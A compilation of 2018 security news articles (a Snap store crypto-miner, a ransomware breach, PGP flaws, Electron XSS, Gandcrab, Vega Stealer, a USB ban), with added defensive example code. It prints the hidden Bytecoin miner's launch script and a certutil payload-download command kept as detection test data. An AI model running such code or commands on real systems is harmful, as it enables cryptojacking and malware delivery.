STE WILLIAMS

Ubuntu sends crypto-mining apps out of its store and into a tomb

Admins of the Ubuntu Store have pulled all apps from a developer who signed himself “Nicholas Tomb”, and whose e-mail signature suggests he wanted to crypto-mine his way to a Ferrari.

Mr Tomb’s “2048buntu” and “Hextris” applications are now absent from the store, with their removal sparked by a GitHub comment about 2048buntu. User Tarwirdur wrote “This application contains hidden crypto-currency miner inside” (it was mining Bytecoin) and asked how this could be reported.

Here’s the code Tarwirdur spotted (look for the e-mail sig in the seventh line):

squashfs-root/systemd - miner
squashfs-root/start - init script:
#!/bin/bash

currency=bcn
name=2048buntu

{ # try
/snap/$name/current/systemd -u [email protected] --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then   # the comparison operator was lost when the script was copied; '<' is assumed here
    /snap/$name/current/systemd -u [email protected] --$currency 1
else
    /snap/$name/current/systemd -u [email protected] --$currency 2
fi
}

Canonical’s Adam Collard responded “yes, we’ve removed all applications from this author pending further investigations. Thank you for your vigilance!”

The apps were created using Ubuntu’s “Snaps” tool, which packages code so that all their dependencies ride along, and install with an auto-updater. Canonical created Snaps to try and simplify package deployment on Linux distributions.

Apps with ride-along miners are hard to spot: even the likes of Google and Apple, which both have cash and people galore, miss malicious apps from time to time. The far-smaller Canonical has the advantage of open sourcery providing an army of crook-code-detectors. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/14/ubuntu_crypto_mining_apps/

Family Planning office warns customers private parts may be exposed

The Australian State of New South Wales’ reproductive and sexual health organisation Family Planning NSW has advised users of an April 2018 ransomware attack that may have compromised sensitive information.

The agency apparently retained web form messages on the public-facing server, meaning if its database was breached, attackers would have access to individuals’ messages to Family Planning.

The organisation said it’s contacting up to 8,000 clients to advise them of the April 26 event, and at the time of writing, its Website carried the message “Our website is getting a security update”.

The agency says it was one of several “targeted by these cyber criminals requesting a Bitcoin ransom on ANZAC Day* [April 25th]”. The organisation’s message says the site was “secured by 10am on April 26”, and “more sensitive medical records held internally were never under threat”.

Family Planning NSW says it has contacted the Australian Federal Police about the attack.

As writer Lauren Ingram pointed out on Twitter, even the contents of a contact form can contain sensitive information: “People contact Family Planning NSW for everything from contraception and advice on unplanned pregnancy/abortion, to cervical cancer screenings, STI tests, vasectomies and men’s sexual heath”, she noted.

Family Planning told The Register while there was a demand for ransom, “According to a security analysis by our webhost, they did not attempt to encrypt data let alone succeed.”

The attackers put a message on the site threatening to shut it down unless they were paid AU$15,000 in Bitcoin, CEO Ann Brassil told a press conference today.

The sensitivity of the information brings any potential breach under Australia’s Notifiable Data Breaches Scheme, which launched in February 2018 (it’s administered by the Office of the Australian Information Commissioner – there’s an explainer here). ®

* Australian and New Zealand’s equivalent of the UK’s Remembrance Day and the USA’s Memorial Day.


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/14/family_planning_nsw_warns_people_of_possible_site_breach/

PGP and S/MIME decryptors can leak plaintext from emails, says infosec Professor

A professor of Computer Security at the Münster University of Applied Sciences has warned that popular email encryption tool Pretty Good Privacy (PGP) might actually allow Pretty Grievous P0wnage thanks to bugs that can allow supposedly encrypted emails to be read as plaintext.

Professor Sebastian Schinzel took to Twitter with the news early on Monday, European time.

A second Tweet warns “There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now.”

Schinzel and his fellow researchers have alerted a few folks about the problem, among them the Electronic Frontier Foundation, which has assessed his research and agreed that PGP has flaws.

An EFF advisory says “these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.”

“Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email,” the EFF’s post said. It also named Enigmail for Thunderbird, GPGTools for Apple Mail and Gpg4win for Outlook as worthy of disablement, and offers instructions on how to do so.

“Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email,” the advisory says.

Schinzel has promised full details on Tuesday morning at 0700 UTC. Reg operatives somewhere will be paying attention when he reveals all. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/14/pgp_s_mime_flaws_allow_plaintext_email_access/

When it comes to patches, how urgent is urgent? [Chet Chat Podcast 268]

In this episode of the Chet Chat podcast, Sophos experts Chester Wisniewski and Greg Iddon discuss the latest Drupal attacks, patch urgency, the IC3 report on cybercrime and the cost of cryptomining.

If you enjoy the podcast, please share it with other people interested in security and privacy and give us a vote on iTunes and other podcasting directories.

Listen and rate via iTunes...
Sophos podcasts on Soundcloud...
RSS feed of Sophos podcasts...


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/UmjKg-XncA4/

Electron spins out a patch for bad XSS bug

Electron developers need to check their apps, after a security researcher turned up a remote code execution bug in the framework.

What TrustWave’s Brendan Scarvell found is that an attacker can turn on services beyond the developer’s intent.

A developer only needed to be a little careless, accepting defaults without explicitly turning a service off, and their application would be vulnerable.

The post noted that the framework is used by “Slack, Discord, Signal, Atom, Visual Studio Code, and Github Desktop”, among others.

Scarvell explained the conditions for an app to be vulnerable: it’s built on version 1.7.13, 1.8.4, or 2.0.0-beta.3, and the developer hasn’t manually set one of the following:

  • “Declared webviewTag: false in its webPreferences;
  • Enabled the nativeWindowOption option in its webPreferences; or
  • Intercepting new-window events and overriding event.newGuest without using the supplied options tag.”

So, what’s going on here? Setting nodeIntegration: false in an app’s webPreferences is supposed to stop content that interacts with the Electron API from reaching the underlying Node.js runtime – and that setting is off by default.

The nodeIntegration: false setting also saves the developer the effort of sanitising user inputs which, if they were handled by Node.js, would enable XSS attacks.

As Scarvell explained, the vulnerability he found allowed an attacker to change the nodeIntegration setting to “true”.

The issue is in the handling of another tag, WebView, which allows a developer to “embed content, such as web pages, into your Electron application and run it as a separate process”, in combination with how Electron handles new browser windows.

An attacker, he wrote, could control the new browser window (the window.open command) to pass a WebView tag that enabled nodeIntegration (that is, set it to “true”).

Electron has provided a patch to CVE-2018-1000136 in versions 1.7.13, 1.8.4, 2.0.0-beta.4 here, along with mitigation instructions if, for some reason, a developer can’t upgrade. ®
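As an added example (not code from the article, Trustwave or the Electron project), the hardened counterpart to the defaults discussed above: two helpers that pin nodeIntegration and webviewTag off for any window or guest, with the will-attach-webview / new-window wiring sketched in comments from Electron’s documented events. The preference objects are constructed samples.

```javascript
// Added example; not code from the article, Trustwave or the Electron project.
// Two pure helpers for an Electron main process: one builds webPreferences that
// cannot be weakened by caller overrides, the other forces Node access off on
// any guest (a <webview> or a window.open child). Both run under plain Node;
// the Electron event wiring that would call them is sketched in comments.

const FORCED = Object.freeze({
  nodeIntegration: false,  // never expose Node.js APIs to page content
  webviewTag: false,       // the <webview> tag is what the CVE-2018-1000136 chain abused
  contextIsolation: true,  // keep preload-script globals out of page JavaScript
});

// webPreferences for new BrowserWindow({ webPreferences: ... }). Callers may add
// options, but the FORCED keys win over anything they pass in.
function hardenedWebPreferences(overrides = {}) {
  return Object.assign({}, overrides, FORCED);
}

// Normalises guest preferences in place, as a will-attach-webview or new-window
// handler should: drops preload scripts and reapplies the FORCED keys.
// Returns the keys it changed so the handler can log the attempt.
function sanitizeGuestPreferences(prefs) {
  const changed = [];
  for (const key of ['preload', 'preloadURL']) {
    if (key in prefs) {
      delete prefs[key];
      changed.push(key);
    }
  }
  for (const [key, value] of Object.entries(FORCED)) {
    if (prefs[key] !== value) {
      prefs[key] = value;
      changed.push(key);
    }
  }
  return changed;
}

// Sketch of the Electron wiring (needs the electron package, so it is a comment):
//
//   const { app, BrowserWindow } = require('electron');
//   app.on('web-contents-created', (_event, contents) => {
//     contents.on('will-attach-webview', (_event, webPreferences, params) => {
//       const changed = sanitizeGuestPreferences(webPreferences);
//       if (changed.length) console.warn('hardened <webview> for', params.src, changed);
//     });
//     contents.on('new-window', (event, url, frameName, disposition, options) => {
//       event.preventDefault();             // ignore the page-supplied options
//       const child = new BrowserWindow({ ...options, webPreferences: hardenedWebPreferences() });
//       child.loadURL(url);
//       event.newGuest = child;             // the event.newGuest override the advisory text refers to
//     });
//   });

// Demonstration on a constructed, deliberately weak preference object.
const weak = { nodeIntegration: true, preload: '/tmp/injected.js' };
console.log('changed:', sanitizeGuestPreferences(weak), '->', weak);
```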


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/14/electron_xss_vulnerability_cve_2018_1000136/

Rowhammer strikes networks, Bolton strikes security jobs, and Nigel Thornberry strikes Chrome, and more

Roundup This week saw hackers exploit train wi-fi connections, while IBM cut off worker thumb(drive)s, and world+dog missed a major security hole in Intel’s CPUs.

With yet another week done, let’s take a look at some of the more noteworthy security bits that also happened.

7Zip gets 7Ripped

Researchers have poked a hole in the 7-Zip archiving tool, and you’ll want to update the software as soon as possible.

The bug, discovered by researcher landave, allows remote code execution by way of poisoned RAR files, though the RAR payload can also be disguised as other archive formats.

Because the flaw can be exploited fairly easily on fully patched Windows 10 machines, you will want to update to 7-Zip version 18.05 or later.

Rowhammer swings again with network-based attacks

It has been three years since the infamous ‘Rowhammer’ technique was first disclosed, and the menace of the bit-slamming memory attack is still being exploited in new and devious ways.

This time it is network connections that have been found vulnerable to the brute-force memory corruption trick. Researchers from Vrije Universiteit in Amsterdam found [PDF] that network packets can be used to trigger the address error conditions on any machine that has remote direct memory access (RDMA) enabled.

This means that, for the first time, Rowhammer has been shown to be remotely exploitable and an attacker no longer requires local access to a machine in order to take advantage of the vulnerability.

What’s worse, RDMA is a favorite technique for low-latency network setups, meaning the vulnerable systems are high-value targets like cloud providers and data centers.

iOS 11.4 leaves USB port USBricked when inactive

Apple has added a new security measure to the next version of iOS that will make it harder to get around the unlock screen of a handset, particularly one that hasn’t been used for some time.

Elcomsoft explains that under iOS 11.4 (now in beta) the lightning/USB port on the iPhone will become partially locked down during long idle periods.

Specifically, when the iPhone hasn’t been unlocked in seven days, the port will go into power-only mode and will not make any data transmissions until it is unlocked again via key code. This means people who seize a phone (via legal or other means) will not be able to use the USB connection to get around locks unless they do so immediately.

It remains to be seen what this could mean for law enforcement tools like GrayKey that are used to get around iPhone lock screens via Lightning.

Georgia comes to its senses, kills stupid ‘hacking’ bill

The infamous Georgia state legislation that would have criminalized many forms of white hat hacking has been put on ice.

Governor Nathan Deal on Tuesday vetoed SB315 amidst pressure from the software and IT industries in the state. The bill would have tightened restrictions on unauthorized access, including criminalizing cases where someone got into a system but did not steal any data.

Many security professionals had opposed the bill arguing that it would have a chilling effect on network security testing and bug-hunting practices.

‘Electrum Pro’ caught lifting coins

Cryptocoin investors will want to make sure they’re not running the malicious ‘ElectrumPro’ wallet, which researchers believe is stealing coins from users.

As BlockExplorer explains, the wallet app is apparently malware in disguise, as it has been caught lifting users’ seed codes. This, potentially, would allow the controller of the malware’s domain to get into user wallets.

The site recommends that anyone who has been using the infected wallet should immediately find and move their cryptocoins to a new, secure wallet, as anyone who had access to the ElectrumPro domain would now potentially be able to remotely access and steal user coins.

Bolton considering eliminating top cybersec job

Sentient mustache John Bolton is reportedly looking to eliminate one of Washington DC’s top infosec jobs.

A report citing sources familiar with the matter says that the White House cybersecurity coordinator position will soon be no more. Security guru Rob Joyce currently holds the position, but is set to step down.

When that happens, Bolton is reportedly planning to leave the position unfilled, effectively doing away with the job altogether and handing over many of its responsibilities to Mira Ricardel, Bolton’s deputy National Security Advisor.

As with many of the Trump administration’s hatchet jobs, the cybersecurity coordinator position was a creation of the Obama regime.

Government cybersecurity experts are, not surprisingly, said to be less than enthused about this move as it suggests the NSA is putting less of a focus on cybersecurity – or at least employing one less cybersecurity expert in its ranks.

State department hacking bill approved

Elsewhere in Washington, DC, the House of Representatives has advanced a bill to invite security researchers into the State Department’s folds.

The excellently named Hack Your State Department Act was approved by the Foreign Affairs committee, meaning the bill is one step closer to a full vote.

The act would establish a research and bug bounty program for white hats who wish to seek out security vulnerabilities in US State Department websites.

The bill is being championed by the bi-coastal, bi-partisan duo of the Teds Lieu (D-CA) and Yoho (R-FL).

Bad Panda makes you a sad panda

F5 Labs has uncovered a new banking malware strain that uses a cute name to hide a scary attack.

Dubbed ‘Panda’, the account-stealing malware is actually a variant on the infamous Zeus trojan that targets banks and cryptocurrency exchanges. In addition to web injects (adding content to otherwise legitimate pages), the malware is able to capture screenshots and log keystrokes. It also has a remote access component that could allow the attacker to break into your machine and get anything they couldn’t lift via the surveillance components.

F5 recommends keeping all anti-malware software up to date in order to prevent infection.

Google Play hit with more malware woes

No, this is not a repeat. More malware nasties have been found lurking in the Google Play store. This time, researchers at Symantec say, it is educational apps and games that are being used as the trojans for the Android infections.

Researchers May Ying Tee and Martin Zhang found more than three dozen examples of such apps having snuck through the Play Store’s screening process, serving Android users additional downloads of Adware and click fraud apps that covertly load up other web pages and blogs in order to inflate affiliate traffic.

Wild pwnberries blossom on Chrome

Elsewhere in Google malware woes, we have a Chrome plug-in attack based on a children’s cartoon. How quaint.

Researchers with Radware say the malicious plugin, dubbed ‘Nigelthorn’, also hijacks infected machines to mine cryptocurrency. Disguising itself as ‘Nigelify’, a Chrome plug-in that turns images on a web page into cartoon character Nigel Thornberry of ‘Wild Thornberrys’ fame, the malware is being spread through Facebook spam and phony YouTube pages.

Both Windows and Linux versions of Chrome are vulnerable to the nasty add-on.

Tor pedo ‘glad to be caught’

The fallout from the FBI’s Playpen operation continues with another pervert being jailed for using the child abuse site, but this one says he’s happy to be sent down.

Irishman Conor Emmet, 20, was jailed for 156 months on Friday after the FBI passed his IP address to Dublin police. He was found with 5,919 images and 328 video files of child abuse, including one video involving an 18-month-old child. Police used that video to identify and rescue the child in Thailand.

Emmet admitted his crimes, saying he was glad the police caught him, and has already begun a treatment program. For that reason the judge only gave him half the maximum sentence and suspended a portion of it. Nevertheless one more child-abuse enabler is off the streets.

In brief

The source code to sales-terminal-infecting malware TreasureHunt has leaked, according to FlashPoint, meaning that miscreants can get their hands on blueprints to credit-card-stealing spyware. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/12/security_roundup/

Gandcrab Ransomware Exploits Website Vulnerabilities

Researchers find campaigns distributing Gandcrab by hosting malware on legitimate websites with poor security measures.

Cryptominers may have stolen the spotlight as cybercrime’s hottest new trend, but it doesn’t mean we can stop paying attention to ransomware. Researchers at Cisco Talos detected a new batch of Gandcrab ransomware being distributed through legitimate but poorly secured sites.

Gandcrab, among the newest threats in the ransomware space, started as a simple attack and quickly evolved as its authors adapted to security defenses. In the first two months of 2018, attackers infected more than 50,000 victims and generated more than $600,000 for attackers. This threat spreads via spam campaigns and exploit kits including Rig and Grandsoft.

Talos researchers were analyzing a recent spam campaign when they found a series of compromised sites delivering Gandcrab and continued to identify four separate campaigns over the period of one week. The first started on April 30 and was disguised as an online order. An attached ZIP file has a Word document that downloads and executes the ransomware. Emails contained either VBScripts or ZIP files but always delivered the same result.

An interesting part of this campaign is the tools used to download Gandcrab. There are several ways to do this with macros, but attackers chose to use certutil.exe, a command line utility installed as part of Certificate Services. The use of certutil demonstrates how adversaries are seeking new and effective ways to download malware onto targets’ machines, says Talos threat researcher Nick Biasini.
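As an added example (not code from the article or from Cisco Talos), detection logic for the certutil-as-downloader technique described above, run over constructed process-creation records in a simplified Sysmon-like key=value format: certutil invoked with download or decode arguments is flagged, and flagged harder when its parent is an Office application, which is the macro-in-Word chain the campaign used. The log lines, paths and placeholder host are all constructed.

```javascript
// Added example; not code from the article or Cisco Talos. Flags process
// creation events where certutil.exe is used as a downloader or decoder, with
// extra weight when the parent is an Office application. The events below are
// constructed samples in a simplified Sysmon-like format (fields joined by '|').

const SAMPLE_EVENTS = [
  'ParentImage=C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE|Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil.exe -urlcache -split -f http://[PLACEHOLDER-HOST]/payload.bin C:\\Users\\Public\\svc.exe',
  'ParentImage=C:\\Windows\\System32\\cmd.exe|Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -verify corp.cer',
  'ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -decode blob.txt out.exe',
  'ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\notepad.exe|CommandLine=notepad.exe',
];

// Arguments that turn certutil into a downloader or a base64 decoder.
const DOWNLOAD_FLAGS = [/-urlcache\b/i, /-split\b/i, /https?:\/\//i];
const DECODE_FLAG = /-(de|en)code\b/i;
// Parents that should never need to download a file with certutil.
const OFFICE_PARENT = /\\(winword|excel|powerpnt|outlook)\.exe$/i;

// Splits 'Key=Value|Key=Value' into an object; values may contain '='.
function parseEvent(line) {
  const ev = {};
  for (const field of line.split('|')) {
    const i = field.indexOf('=');
    if (i > 0) ev[field.slice(0, i)] = field.slice(i + 1);
  }
  return ev;
}

// Returns null for benign events, otherwise { severity, reasons, commandLine }.
function analyzeEvent(line) {
  const ev = parseEvent(line);
  const image = (ev.Image || '').toLowerCase();
  if (!image.endsWith('\\certutil.exe')) return null;
  const cmd = ev.CommandLine || '';
  const reasons = [];
  if (DOWNLOAD_FLAGS.some((re) => re.test(cmd))) reasons.push('download-style arguments');
  if (DECODE_FLAG.test(cmd)) reasons.push('base64 decode/encode of a file');
  if (reasons.length === 0) return null; // ordinary certificate work (e.g. -verify)
  const officeParent = OFFICE_PARENT.test(ev.ParentImage || '');
  if (officeParent) reasons.push('spawned by an Office application');
  return { severity: officeParent ? 'high' : 'medium', reasons, commandLine: cmd };
}

// Runs the check over a batch of records and keeps only the findings.
function scanEvents(lines) {
  return lines.map(analyzeEvent).filter(Boolean);
}

for (const finding of scanEvents(SAMPLE_EVENTS)) {
  console.log(finding.severity.toUpperCase(), '-', finding.reasons.join('; '), '::', finding.commandLine);
}
```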

A couple of days later, the second campaign arrived. Its subjects, bodies, and attachments were very similar to those in the first; however, the location where the payload was hosted had changed. Researchers looked at the DNS and noticed it was delivered from a legitimate site, which was running phpMyAdmin and had multiple MySQL flaws and default credentials. The website was taken down shortly after this was discovered, researchers say in a blog post.

The third campaign was found downloading Gandcrab from an out-of-date WordPress site riddled with vulnerabilities. The fourth leveraged the same website, highlighting another trend. Sometimes attackers return to the same site, even after it has been taken down. This pattern shows attackers aren’t putting much effort into making their campaigns unique.

Biasini says this distribution of Gandcrab highlights a major problem for businesses: website compromise. Many of the Web pages on the Internet are running on antiquated software and most small businesses don’t know a new flaw has been released. Even if they did, they don’t have the expertise or time to update the software they rely on.

“It is increasingly easy to create a website based on a lot of the Web frameworks like WordPress, Joomla, and Drupal, among others,” he explains. “The challenge is that most people creating and hosting a small-business website aren’t aware that the software needs to be updated and secondly may not have the knowledge or time to undertake such an endeavor.”

Each of these platforms has some form of remote management, Biasini continues. Average employees don’t realize this portal needs to have strong credentials and, ideally, have the administrative page restricted to the specific IP address space. “These exposed admin pages with weak credentials are easily compromised by far more sophisticated adversaries,” he notes.

Attackers will continue to leverage compromised websites because they save time and money related to domain registration, buying VPS, and configuring the server to host files. They also inherit the site’s reputation, which can help with slipping past blacklisting systems.

This specific version of Gandcrab is generating a discussion around how often the malware is updated, and its creators’ active participation in developing new iterations of it. “They are continually making changes and updates to this ransomware,” says Biasini.

Businesses can protect themselves by patching their software, including any and all plug-ins that could be used on the site. Beyond that, he recommends securing admin portals on the pages and implementing strong passwords. In a brute-force attack, weak passwords could lead to compromise and grant the attacker access until the authentication is updated.


Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial …

Article source: https://www.darkreading.com/endpoint/gandcrab-ransomware-exploits-website-vulnerabilities/d/d-id/1331787?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Proofpoint Sounds Warning on Vega Stealer Targeted Data Theft Campaign

Marketing, PR, and advertising firms are among those being targeted.

A low-volume data-stealing campaign with the potential to get much bigger has begun targeting retail and manufacturing companies and also a select list of marketing, advertising, and public relations firms.

Email security vendor Proofpoint says it has observed and blocked new malware called Vega Stealer that is being used in the campaign to steal saved credentials, credit card data, and profile information in the Chrome and Firefox browsers. The malware is also being used to steal other sensitive data from infected computers.

Vega appears to be a somewhat stripped-down variant of August Stealer, a malware that a threat actor dubbed TA530 used in a highly personalized data-stealing campaign in 2016 aimed at managerial and customer service staff at retail companies.

As with the August Stealer campaign, the new campaign involving Vega Stealer is notable for how targeted it is. Proofpoint says it has observed emails with subjects like “Online store developer required” being sent to what it described as a “narrow set” of companies in the targeted industries.

The emails have contained a rogue attachment called “brief.doc” containing macros that download Vega Stealer. In addition to individuals, the threat actor has been sending emails with the malicious attachment to distribution lists such as “[email protected]” and “[email protected]” in an apparent bid to multiply the number of potential victims at the targeted domains.

Kevin Epstein, vice president of threat research at Proofpoint, says the motivations behind the threat actor’s targeting are presently unclear. “At this time, we cannot speculate on potential motivations,” he says. Campaigns of this size are often either a test or a targeted effort. What organizations need to keep in mind is that Vega Stealer is capable of stealing a wide variety of data stored by Web browsers and on infected systems.

Vega Stealer in its present form is not particularly sophisticated and does not employ any packing or obfuscation methods to evade detection. The malware is designed to steal passwords, cookies, profile data, and saved credit card information from browsers. It can also search an infected computer’s desktop and subdirectories for Word documents, spreadsheets, and PDF files. The malware communicates with a hard-coded remote command and control (C&C) server to which it also sends any stolen data.

What makes Vega Stealer somewhat problematic is its lineage, according to Proofpoint. Vega Stealer appears to be a modification of the considerably more widely distributed August Stealer and is being distributed by a threat actor linked to Ursnif, a somewhat notorious banking Trojan.

“August Stealer has become a fairly common threat, and Vega is a descendent of this malware,” Epstein says. “It also appears that the actor distributing Vega regularly distributes the Ursnif banking Trojan, which often downloads secondary payloads such as Nymaim, Gootkit, or IcedID,” he says. All of these are well-established malware families that continue to be under active development.

Organizations in targeted sectors need to keep an eye out for Vega Stealer. Though the malware is not especially sophisticated in its current form, it has the potential to become a bigger threat in future. “Although Vega does not appear to be as robust yet as August Stealer, the potential for information and credential theft for unprotected organizations is high, especially if we begin to see more widespread distribution,” Epstein says.

“Email gateway protection, network protection to detect C&C communication and data exfiltration, and endpoint protection all contribute to keeping organizations safe” from threats like these, he says.


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

Article source: https://www.darkreading.com/attacks-breaches/proofpoint-sounds-warning-on-vega-stealer-targeted-data-theft-campaign/d/d-id/1331789?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

IBM bans USB drives – but will it work?

A job worth doing is worth doing well.

And when a job is worth doing well, it’s often worth going all-in.

A good example is how to quit smoking: you can try cutting down a bit in the hope of tapering off; you can try smoking milder cigarettes; you can try replacing your addiction to the nicotine in cigarettes with an addiction to the nicotine in something else; you can even carry on smoking but tell everyone, including yourself, that you didn’t inhale.

But quitting doesn’t admit of half measures, and the best and quickest way to do it is simply never to smoke again, from this day forward, for evermore.

Job done. (As in, “Easier said than.”)

By all accounts, IBM has decided to do just that – go cold turkey, that is – in dealing with the problem of lost data on removable storage devices.

Simply put: NO MORE USB DRIVES.

Instead of trying to manage the problem of who copied what to which USB stick from what computer using which type of encryption, word on the street is that IBM’s Chief Information Security Officer (CISO), Shamla Naidoo, has taken a much blunter approach, along the lines of, “If you want to move files around, use the network.”

It’s a bold approach, and in the modern cloud era, it’s not as outrageous as it might at first sound.

Many users are perfectly used to backing data up into the cloud, and even to having files such as photos automatically uploaded from one device and seamlessly synched with another.

But can an outright ban on something as widely used, and as useful, as USB sticks really work?

We asked our very own CISO, Ross McKerchar, what he thought:

Removable storage is a massive concern. While it’s a less common (but still real!) malware infection vector now, the biggest risk these days is data leakage.

To take a quick trip down memory lane: seven years ago we bought a stash of USB keys from a lost property auction as an experiment. 66% of them had malware on, and not a single one was encrypted.

With Europe’s GDPR kicking in at the end of this month, threatening much bigger fines for companies that don’t take proper care of their data, the timing of IBM’s new rule is hardly a surprise.

After all, if you don’t have a USB drive in the first place, you can’t lose it, so that’s one less way for data to show up in the wrong places.

But, as Ross warns:

Outright bans of any useful technology breed “shadow IT” [where users just do their own IT thing anyway]. Humans are highly creative and often find workarounds that are more risky than the thing being banned. Where possible, organisations will be more effective making the easy way the safe way.

Enforcing USB encryption across a company the size of IBM is probably very tricky, but for a company of average size, it’s a good way to mitigate the risk whilst allowing people to work in a way they’re comfortable with.

Providing sanctioned cloud sharing services as well, combined with the right controls and training, helps further because it can avoid the need to copy data onto USB drives in the first place. One handy thing about sharing rather than copying content is that it’s much easier to audit and ‘unshare’ if a mistake is made.

What’s a USB drive, anyway?

One tricky challenge with an outright ban on USB drives is that there are many different sorts of removable storage – notably including devices that present themselves with two faces.

For example, I have a portable audio recorder that I use for podcasting: you can plug it into a laptop and use it as a high-quality microphone, or you can use it as a handheld standalone device and download the files from it later on.

You can see where this is going: when you connect the device via a USB cable, a menu pops up on the device where you choose which way the device will work, and one of those options makes it behave as a USB drive.

Do you ban the device because it’s a part-time USB drive? Do you take the extra steps needed to teach your device control software that it’s two subdevices, and that the audio-flavoured one is OK but the disk-flavoured one is not?

If you make me an exception to the rule, because I’m special on account of doing podcasts, how do you deal with the fallout from that, when everyone else decides they’re special, too?

(All they have to do is say they need to record meetings, or that they’re also into podcasting, or that they’ve got a similar issue with a camera that they use for work purposes.)

If you block everyone else, forcing them to change, but let me off the hook so that I really am special, what then?

As Ross warns:

Insider threats are a concern for all organisations. The first defence is a vigilant management team – employees intent on doing something malicious are often disenfranchised and frustrated.

What to do?

We can see why IBM, an enormous IT company that is itself a giant cloud provider, might want to replace USB drives with ubiquitous network storage, and why such an approach might not only work well, but also be largely obeyed by staff.

But if you have a small business, with a few employees who are sometimes in the office, sometimes at home, and sometimes on the road…

…the convenience of USB drives for temporary backup, or to have around to tide you over internet outages, is probably a baby that you don’t want to throw out with the bathwater.

Worse still, even if you try to ban USB drives outright to save IT effort, you may very well find that you have created yet more IT effort to make sure you detect, yet sometimes still allow, all the “edge cases” such as audio recorders, cameras, and so on.

So, here are some tips that avoid the need for an outright ban on anything:

  • Encrypt all your USB devices. It’s a bit more work than just having a free-for-all, but if you routinely encrypt everything, you never have to worry whether there were any files you forgot about.
  • Provide easy-to-use alternatives. If you want to wean your staff off USB storage, give them a cloud-based solution that they’ll want to use, and that’s easy to learn.
  • Make everyone aware of the risks. Banning USBs won’t stop data leakage – data copied to the cloud has “gone somewhere else” too, after all – so make sure your staff know why it’s important to care about security.
  • Check your logs. Whether you use USBs, cloud drives or both, be sure to check any logs you keep of who’s put what where. If you aren’t going to look at your logs, don’t bother keeping them – never collect any data without a purpose.
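As an added example (not from the original article), here is a small log check in the spirit of the last tip and of the two-faced recorder described above: it reads Linux kernel log lines, works out which USB devices exposed a mass-storage interface, and separately flags composite devices that offered both a non-storage interface (audio, in the recorder’s case) and a disk. The sample lines are constructed for the example; the snd-usb-audio message wording and the vendor/product IDs are made up, and only the usb-storage/uas driver names are assumed to be real.

```python
import re

# Constructed sample lines in the style of a Linux kernel log (syslog format).
# Not captured from a real host: the IDs and the snd-usb-audio wording are made up.
SAMPLE_LOG = """\
May 14 09:01:02 laptop kernel: usb 1-1: New USB device found, idVendor=1111, idProduct=0001
May 14 09:01:02 laptop kernel: usb 1-1: Product: Thumb Drive
May 14 09:01:03 laptop kernel: usb-storage 1-1:1.0: USB Mass Storage device detected
May 14 09:02:10 laptop kernel: usb 1-2: New USB device found, idVendor=2222, idProduct=0002
May 14 09:02:10 laptop kernel: usb 1-2: Product: Handy Recorder
May 14 09:02:11 laptop kernel: snd-usb-audio 1-2:1.0: audio interface registered
May 14 09:02:40 laptop kernel: usb-storage 1-2:1.1: USB Mass Storage device detected
May 14 09:05:00 laptop kernel: usb 1-3: New USB device found, idVendor=3333, idProduct=0003
May 14 09:05:00 laptop kernel: usb 1-3: Product: USB Keyboard
May 14 09:05:00 laptop kernel: usbhid 1-3:1.0: USB HID v1.10 Keyboard
"""

TIME_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d)")
DEVICE_RE = re.compile(r"kernel: usb (\S+): New USB device found, idVendor=(\w+), idProduct=(\w+)")
PRODUCT_RE = re.compile(r"kernel: usb (\S+): Product: (.+)$")
# "<driver> <port>:<config>.<interface>:" lines show which driver bound to each interface.
IFACE_RE = re.compile(r"kernel: (\S+) (\d[\d.-]*):\d+\.\d+:")
STORAGE_DRIVERS = {"usb-storage", "uas"}

def parse_usb_log(text):
    """Group lines by USB port: {port: {id, product, drivers, first_seen}}."""
    devices = {}
    for line in text.splitlines():
        if m := DEVICE_RE.search(line):
            t = TIME_RE.match(line)
            devices[m.group(1)] = {"id": f"{m.group(2)}:{m.group(3)}", "product": "?",
                                   "drivers": [], "first_seen": t.group(1) if t else "?"}
        elif (m := PRODUCT_RE.search(line)) and m.group(1) in devices:
            devices[m.group(1)]["product"] = m.group(2)
        elif (m := IFACE_RE.search(line)) and m.group(2) in devices:
            devices[m.group(2)]["drivers"].append(m.group(1))
    return devices

def classify(dev):
    """'storage' for a plain drive, 'composite-with-storage' for a two-faced device."""
    drivers = set(dev["drivers"])
    if not drivers & STORAGE_DRIVERS:
        return "non-storage"
    return "composite-with-storage" if drivers - STORAGE_DRIVERS else "storage"

def storage_report(text):
    """(port, first_seen, vid:pid, product, kind) for devices that exposed a disk."""
    return [(port, d["first_seen"], d["id"], d["product"], classify(d))
            for port, d in parse_usb_log(text).items() if classify(d) != "non-storage"]
```

On the sample above the keyboard never appears in the report, the thumb drive is reported as plain storage, and the recorder is reported as a composite device, which is exactly the case a blanket "block all USB drives" rule has to decide about.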

To finish off with some board-level advice from Ross:

